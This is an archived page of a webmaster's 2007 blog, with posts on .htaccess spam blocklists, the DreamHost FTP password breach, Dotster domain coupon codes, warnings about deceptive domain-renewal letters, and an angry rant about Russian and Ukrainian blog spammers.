Lastly, I present for your viewing pleasure, the Russia and Exploited Servers Blocklist. This list is growing faster than the other two because I am getting hit constantly by so many Russian based blog and log spammers and server exploit attempts, from both shared and dedicated servers around the World. This blocklist contains a large number of IP addresses and CIDRs (basically means IP ranges) from Russia, The Ukraine and other former Soviet Bloc Countries, Turkey, Algeria, and from a huge number of exploited web servers, co-location server farms, and hosting companies around the World. Servers should not be trying to contact other servers, unless they have a relationship with each other. These servers want to hack or spam your server or websites and should be blocked.

All of these blocklists are still being added to or modified as new information is discovered about the sources of scams, spamming or hacking attempts from exploited servers. Each page has a button (under the bold last-modified date, before the directives) for you to use to sign up for alerts from the ChangeDetection bot, which will email a notice to you once a day, only on days that I have modified the blocklist you are monitoring. This is a free service that I use myself. Next to that button you will see a PayPal Donate button that I have placed there, where people who benefit from my voluntary work can show some financial appreciation. Any amount will be gladly accepted, with a $10 minimum please.

There are links to contact me for assistance or to provide input, on all of the blocklists, in the footer area.

Continue reading "Block spammers, scammers and hackers with our .htaccess blocklists" »

Posted by Wiz at 5:30 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

I am a member of and Moderator of the computers section of the Steel Guitar Forum, which has been offline since the morning of June 19 (2007). In an email exchange with the owner - b0b Lee - it was revealed that workers on the street outside of the server's location have accidentally cut his T1 line. AT&T will be repairing the line as soon as possible. SGF members may wish to use this time to practice their steel guitars, until the forum is back online.

The Steel Guitar Forum is a multi-section discussion forum for members only, most of whom are either amateur or professional pedal steel guitarists. I have been a member for a number of years since I am also a professional pedal steel player. My section is the computers forum, of which I am the moderator and a strong contributer.

Anybody who plays any type of steel guitar (pedal, non-pedal, or lap steel), or a resophonic guitar is welcome to apply for membership at the SGF.

UPDATE: The SGF is now back online.

Posted by Wiz at 10:19 AM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

DreamHost Status Blog Archive Security Breach

It seems that somebody has managed to hack into the customer database for FTP login passwords, at the DreamHost website hosting company. According to an email sent out to the affected Dreamhost customers, 3500 accounts seem to have been breached by a hacker, or hackers, using as yet unknown attack vectors.

According to the update posted by DreamHost, on June 7, this may be a combination of security breaches, including keyloggers that may have been installed onto the affected users' computers. That means that the same thing could affect users of other web hosting companies. So far the hack appears to be the addition of various iframe codes or links to porn sites, to all files containing the word "index" of the compromised accounts. The file extension does not matter; if you have a file containing the word "index" it will be a target of this hacker. This includes index files in sub-directories, or add-on domains hosted under the same master account. Therefore, all website owners are urged to download their index files and inspect them for unauthorized modifications. If you find any remove them and notify your hosting provider, and scan your own computers for spyware, keyloggers, or backdoor trojans.

In one blog post about this I read that at least one DreamHost customer had all of his "index" files overwritten completely with a page containing an iframe exploit, leading to a website that installs a Trojan Horse program.

There is a statement about this incident, from the DreamHost blog, in my extended comments...

If you are a DreamHost customer, and you have scanned your computer for security breaches and found none, and you were notified that your account was among those compromised, and you are looking for another web host, I use and recommend BlueHost Web Hosting. They offer huge amounts of disk space and data transfer, plus unlimited add-on domains, for those who need to host multiple domains at a low monthly rate. I have all of the details on my BlueHost page. I have been with them for over 6 months and have had very little downtime - well less than I used to experience with my previous web host. My server has not been hacked, altho I see people trying to do so every day or two (by reading my raw access and error logs).

I am available to assist people whose websites and/or computers have been compromised by hackers, spyware, keyloggers, or other security threats. Please visit my home page for more information and links to my webmaster services and contact pages.

Continue reading "3500 FTP account passwords stolen from DreamHost database" »

Posted by Wiz at 12:45 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Attention website owners!

If you have been thinking about registering a few new domain names, but were waiting until the price was "right," your moment has just arrived! Dotster Domain Registrars just announced a half price sale on new domain registrations, this coming Memorial Day Weekend, from May 26, through 28, 2007. Domains regularly priced at $14.95 will only cost you $7.48 per year, using my coupon code below.

Note that this only applies to brand new domain names, not renewals or transfers.

Dates - May 26th, 27th, 28th

Discounted Extensions - .com, .net, .org, .biz, .us

Coupon Code: MDAY50

Bonus coupon code offer

Dotster also provides all manner of web hosting packages, from low cost shared hosting to VPS semi-dedicated, at very reasonable prices.

5 Free Domains with Any Dotster Web Hosting Package! Enter Coupon Code "5FORFREE"

Posted by Wiz at 7:06 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

Yee Haw! Domain Registrar - Dotster, Inc. has just announced a March Madness sale on new and transfered Domain registrations, from now until April 1, 2007. Dotster is allowing unlimited numbers of registrations and transfers at the low low rate of only $7.00 each, when you use coupon code MADNESS during checkout. The regular price for new domain registrations at Dotster is $14.95, per year, so you will save a whopping 53% off new registrations. Domain transfers are regularly $8.95, so you will save 22%, plus gain one extra year on the expiration date, per domain transferred.

If you want to have a web presence you will need to have a domain registered with a recognized Registrar. Dotster is a leading ICANN-accredited registrar capable of registering your .com, .net, .org, .cc, .tv, .ws, .info, and .biz top level domain (TLD) names.

If you would like to learn more about Dotster's services, read my Dotster information page. I have been a happy Dotster customer for 7 years and won't even consider another registrar. Most of my Webmaster clients are also registered at Dotster. Dotster also offers fast and affordable custom web design.

Posted by Wiz at 3:35 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

< Begin Rant >
If you publish a blog (Weblog) using MovableType, I'm certain that you have learned that if you accept comments, or trackbacks, that you are going to attract blog spam (splog). I used to allow comments and trackbacks on my blog until I found that all of the comments and trackbacks were 100% spam, with links to sleazy websites. Being the curious, suspicious spam/scam hunter type person that I am, I began studying my raw access logs to see where this crap was coming from. I wasn't surprised when I discovered that most of the blog spam I was getting aimed at my blog was coming from a few IP addresses in the Ukraine and Russia. Normally I would consider Russians and Ukrainians to be educated, intelligent folks, but now I have to wonder if I was mistaken in that line of thought.

The reason I make such a harsh statement is because I have not allowed comments or trackbacks to be posted for a long time now (Turn Off Comments and Trackbacks), and when I did allow them I always moderated them and deleted spam comments; they were never posted. In an effort to curtail the continuing attempts to post spam to my blog I have even removed the files used to post comments and trackbacks to my MovableType blog. Still, every day, for hours at a time, idiots in Russia and the Ukraine keep trying to spam to my blog, despite the fact that I clearly state that no comments or trackbacks are accepted, and the files that are required for them are gone. Everytime these idiots Post a comment or trackback my server gives them a 403 Forbidden response, but they don't seem to care, or notice, or are too uneducated to understand that Access Denied means that their request failed to go through! So, growing tired of even giving them the courtesy of a 403 response I am now redirecting all of these bullshit attempts to Post comments or trackbacks right back to the sender's own browser or web appliance; to 127.0.0.1. That should result in a Page Cannot Be Displayed or Server Cannot Be Located message on the program the idiots are using to try to spam me.

The blog spammers are even resorting to using hijacked proxies, on computers in other countries, but they all get the same message, since I block all such exploits in my .htaccess file. I wasn't born yesterday. I know how to block IP addresses, proxies and unwanted behavior or exploits on my server. I also know how to track the source to their ISP and report them for spamming.

If you run MovableType blogs on an Apache Server, and are interested in seeing in my solution to the problem of blocking blog spammers, read my extended comments.

Continue reading "Russian and Ukrainian Blog Spammers are STUPID!" »

Posted by Wiz at 2:25 AM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

If you are a website owner, and are thinking about adding another domain name, Dotster.com
is having a one day sale on all new domain registrations of the TLDs: .com, .net, .org, .biz and .us. For the 24 hour period beginning tomorrow, February 28, at 12:01 AM, through 11:59 PM, PST, all new Registrations are only $7.00 for one year! The regular price for these TLD registrations is $14.95/yr. That represents a savings of $7.95 bubba, and that ain't hay! Heck, at that price I'll grab a couple of new domain names and park them on my home page, or add them on to my BlueHost account, since they allow up to 5 additional domains to be hosted under one account, for free.

To grab your $7.00 domain go to Dotster.com
on Feb 28 and use the coupon code: 7domain, when you place the order.

I have more information about Dotster Domain Registratrar on my website. I also have a complete webpage about BlueHost, here.

Dotster is also offering coupon code discounts on a second year of web hosting (7hosting), and on their in-house website design services. Visit Dotster.com
before March 1, 2007, for the details.

Posted by Wiz at 2:10 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

If you own any Internet Domains you already know that they require a valid Domain Registrar to hold your registration information, before they can go live on a web host or server. I have had website domains since around the year 2000, and they have all been registered through the same Registrar; Dotster.

Today I received a deceptive letter in the mail from Liberty Names of America, apparently a Domain Registrar. At the top right, in large bold type it said: Domain Name Expiration Notice. After that, in small print, it stated: "As a courtesy, we would like to remind you that it's time to renew your domain name, which is expiring on April 27, 2007." Below that it listed one of my various domain names and a reply by date of March 14, 2007. The rest of the details in the letter are in small type, except for the parts where it outlines the renewal rates for 1, 2 and 5 years, and the place where the gullible would fill in their credit card details to "renew" their domain with these pirates.

As I stated in the first paragraph, Dotster, Inc. is and always has been my domain Registrar. Liberty Names Of America is harvesting the Whois records for as many domains as they can lookup, then sending out phoney renewal notices to capture business away from the existing Registrars, by decieving gullible recipients of these letters. To be fair, the letter does state, in small print, that they are not your current Registrar, and that they want you to transfer to them. The back side of the letter contains almost 7" of type that is so tiny that it requires a magnifying glass to read it. In that tiny type are the legal details and disclaimers for their transfering of your service.

As a reference to you all, I currently pay $14.95 per year (1 yr renewals) to maintain my domains at Dotster. Liberty Names is offering me the fabulous opportunity to transfer my domain away from $14.95 a year with Dotster to them, for the low rate of only $25.00! Hmmm. Simple math tells me that they are charging almost twice what Dotster charges for common TLD domain name registration. PIRATES! Take me off your mailing list, Liberty Names of America. You are slimeballs, just like DROA, who sends out similar Expiration Notices to domain owners. Are you the same slimeball company under a different name? Go F yourself!

Now that my tirade is over, if you really do need a decent domain registrar, one that won't dick you around, I recommend Dotster. For $14.95 you can register your domains, not $25, or $35, or $40 per year that the ripoff registrars charge. They do have sliding reduced rates for 5 or 10 year renewals and charge only $8.95 to transfer your existing domain, plus they add one year to it's expiration date.

Nuff said.

Posted by Wiz at 1:41 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

I finally put the finishing touches on my revamped website hosting page, found at www.wizcrafts.net/hosting.html, on August 30, 2006. This is the first major overhaul of that page in many months.

The old page made a very brief mention about what hosting is and only scraped at the surface of the concept of different types of hosting accounts. It then went on to list the detailed features of a few select web hosting companies, wih no mention of alternatives. to say the least it was lacking in breadth of coverage.

The new hosting page is totally the opposite in how it presents information. The first half of the page contains reasonably detailed explanations about what website hosting is, what web servers are, and details the differences between dedicated, semi-dedicated, VPS and shared web hosting.

The next section explains domain name registration and registrars.

Following that I have embedded a comparison of over 20 shared-hosting companies, outlining their allowed disk space, bandwidth (data transfer), email or FTP accounts, add-on domains policies and pricing (monthly and annual). I have also created separate pages detailing the features of the various hosting plans, showing as many features as the company publishes online. Those pages contain links to the companies and to alternate services like VPS servers. I have not finished the features pages for all of the listed web hosts, but am in the process of creating new ones every day or two. I am also trying to keep the disk space/bandwidth/pricing up to date, as several companies are frequently changing their plans to respond to their competitors.

I also plan to include a voting script on each features page, in the immediate future. I look forward to your input to help rate the various hosts according to your own experiences with them (not hearsay).

The final section of the new hosting page deals with website promotion tools and has several very useful links to help you get listed or improve you online business prospects.

Please avail yourselves of this information, found at www.wizcrafts.net/hosting.html

Continue reading "My Website Hosting Page Has Been Totally Revamped" »

Posted by Wiz at 2:09 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

This is a heads-up warning to my fellow Domain owners to watch out if you get a letter in the mail from Domain Registry Of America, or some other Domain Registrar with whom you are not already affiliated as a customer.

Today I got a letter from Domain Registry Of America, addressed to my master account name used in the Whois Directory. The letter proclaims in large bold text:
Domain Name Expiration Notice
It then displays one of my Domain names that is due for renewal in 6 months and "As a courtesy to Domain name holders, we are sending you this notification ....."

Upon carefully reading the details they do make it clear that they are not your current Registrar, and want you to switch from you Registrar to DROA. They brag about only charging $30 for a one year renewal fee, and a bargin rate of only $50 for two years. There are checkboxes to place your order and a place to input your credit card numbers, which you would then mail in. There is a huge amount of information and disclaimers on the back of the letter that are in such a small font I had to get a magnifying glass to read it. I wouldn't transfer to these people if they were the last Registrar on earth.

If I was paying $35.00 a year for a Domain that would sound like a bargain, but I am a Dotster customer (see below), and only pay $14.95 per year for TLD Domains (or less if there is a special deal or Happy Hour Sale). If I was fooled into transferring to those people it would double the cost of renewing my Domains. Luckily I wasn't born yesterday.

Many Domains are owned by companies that have different people who know different details about the business, but not everything. These people are probably hoping that this letter will end up at Accounts Payable, where the secretary will call somebody to ask if they have a Domain that might need to be renewed, to which that person may say I think so. The Accounts Payable will pay the invoice by credit card and the company will have their Domain name transfered away from their current chosen Registrar by trickery, probably at increased expense.

I have seen other letters from other Registrars that never mentioned that they are not my current Registrar, asking for x amount of dollars to renew my expiring Domains. This is pure fraud, trying to get me to pay an invoice to a company with whom I have absolutely no relationship. If you do make the mistake of transferring your Domain to such a company you will probably never be able to get them to let you change back. Once a company like that gets your Domain name they make it almost impossible to transfer away from them. Legitimate Registrars have a simple method of locking and unlocking Domain transfers, with no fees (see below about Dotster).

As a Domain owner make it your business to know with whom your Domains are registered and what the renewal dates are for each Domain. Most Registrars with whom you are a customer will attempt to contact you by email first, to let you know 60 days in advance of a renewal date. Always check carefully when you receive a Domain renewal notcie to be sure it is from the Registrar who holds that Domain for you.

My Recommended Registrar:

If you are paying more than $14.95 a year for your Domains take my recommendation and check out Dotster.com. Dotster is an ICAAN Accredited Registrar and is above board all the way. They will not try to scam or trick you into unwittingly transferring a Domain to them. In fact, if you do transfer an existing Domain to Dotster they only charge $8.95 for the transfer and first year Registration, plus they extend your expiration date by an additional year. I have a lot more info about this on my Dotster web page. I have been a Dotster customer since the year 2000 and have never had a complaint about their services or methods of communications.

Continue reading "Beware of DROA Domain Name Expiration Notice Postal Mailings" »

Posted by Wiz at 12:59 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.

The Happy Hour $2.00 Domain name sale has expired, at Dotster.com. I'll let you know when the next one is announced.

If you need to register a new or additional Domain name, I recommend Dotster, which is my Registrar. TLDs go for $14.95 /yr, and transfers are $8.95 with one additional year added to your expiration date, and they have a limited time sale on .info Domains, for only $2.99 for one year.

Use this link to go to the Dotster home page and search for your desired Domain name(s).

Dotster is my registrar for all of my Domains, and most of my Webmaster Services customers use them as well. Dotster is an ICAAN Accredited Registrar and has been around for quite a while now. I first learned about them from Leo LaPorte, on Tech TV. I have more details about their services on my Dotster web page, and on my web hosting page. Dotster accepts Domain registrations from people around the World.

I was there on the 26th and bought a new Domain name, www.computer-consulting-services.com and got a free .info with the same prefix. I'll be putting content on it over the next few weeks, but right now it is parked, waiting for my brain cells to wake up again. Watch my blog for details about this new Domain.

Posted by Wiz at 10:34 PM | Permalink

Get Norton 360 - All In One Security. Comprehensive, easy�to�use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 5.0.